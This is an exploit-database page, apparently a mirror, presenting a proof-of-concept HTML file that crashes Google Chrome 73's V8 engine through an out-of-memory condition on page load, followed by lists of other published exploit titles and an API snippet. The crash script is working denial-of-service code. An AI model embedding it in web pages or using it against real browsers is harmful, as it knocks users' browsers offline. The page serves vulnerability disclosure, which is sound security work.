Menu

Search for hundreds of thousands of exploits

"Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)"

Author

Exploit author

"Bogdan Kurinnoy"

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-04-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<!--
# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-04-20
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 73.0.3683.103
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid table size 

# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
-->


<html>
<head>
<script>

var arr1 = [0,1];

function ObjCreate(make) {
  this.make = make;
}

var obj1 = new ObjCreate();

function main() {

	arr1.reduce(f3); 

	Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));

}

function f3() {

	obj1["make"] = RegExp(Array(60000).join("CCC")); 
}

</script>
</head>
<body onload=main()></body>
</html>
Release DateTitleTypePlatformAuthor
2020-02-20"Core FTP Lite 1.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-20"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)"webappsphpindoushka
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"Virtual Freer 1.58 - Remote Command Execution"webappsphpSajjadBnd
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-18"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting"webappsphp"Ultra Security Team"
2020-02-17"SOPlanning 1.45 - 'by' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-17"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"SOPlanning 1.45 - 'users' SQL Injection"webappsphpJ3rryBl4nks
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-17"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)"webappsphpJ3rryBl4nks
2020-02-17"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting"webappsphp"Ashkan Moghaddas"
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation"localwindowsnu11secur1ty
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"LabVantage 8.3 - Information Disclosure"webappsjava"Joel Aviad Ossi"
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
Release DateTitleTypePlatformAuthor
2020-02-10"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()"dosmultiple"Google Security Research"
2020-02-10"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting"webappsmultiple"Prasenjit Kanti Paul"
2020-02-07"Google Invisible RECAPTCHA 3 - Spoof Bypass"webappsmultipleMatamorphosis
2020-01-28"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image"dosmultiple"Google Security Research"
2020-01-22"KeePass 2.44 - Denial of Service (PoC)"dosmultiple"Mustafa Emre Gül"
2020-01-16"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal"webappsmultiple"Dhiraj Mishra"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2020-01-16"Tautulli 2.1.9 - Denial of Service ( Metasploit )"webappsmultiple"Ismail Tasdelen"
2020-01-13"Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)"webappsmultiplemekhalleh
2020-01-11"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)"webappsmultiple"Project Zero India"
2020-01-11"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution"webappsmultipleTrustedSec
2020-01-01"nostromo 1.9.6 - Remote Code Execution"remotemultipleKr0ff
2019-11-20"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)"remotemultipleMetasploit
2019-11-20"FusionPBX - Operator Panel exec.php Command Execution (Metasploit)"remotemultipleMetasploit
2019-11-20"FreeSWITCH - Event Socket Command Execution (Metasploit)"remotemultipleMetasploit
2019-11-11"iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address"dosmultiple"Google Security Research"
2019-11-05"JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects"dosmultiple"Google Security Research"
2019-11-05"WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive"dosmultiple"Google Security Research"
2019-11-01"Nostromo - Directory Traversal Remote Command Execution (Metasploit)"remotemultipleMetasploit
2019-10-30"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation"dosmultiple"Google Security Research"
2019-10-28"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed"dosmultiple"Google Security Research"
2019-10-25"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)"remotemultipleallyshka
2019-10-22"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)"remotemultipleMetasploit
2019-10-14"Apache Httpd mod_proxy - Error Page Cross-Site Scripting"webappsmultiple"Sebastian Neef"
2019-10-14"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts"webappsmultiple"Sebastian Neef"
2019-10-14"Apache Httpd mod_rewrite - Open Redirects"webappsmultiple"Sebastian Neef"
2019-10-03"AnchorCMS < 0.12.3a - Information Disclosure"webappsmultiple"Tijme Gommers"
2019-10-01"WebKit - UXSS Using JavaScript: URI and Synchronous Page Loads"dosmultiple"Google Security Research"
2019-10-01"WebKit - Universal XSS in WebCore::command"dosmultiple"Google Security Research"
2019-10-01"DotNetNuke < 9.4.0 - Cross-Site Scripting"webappsmultipleMaYaSeVeN
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46735/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse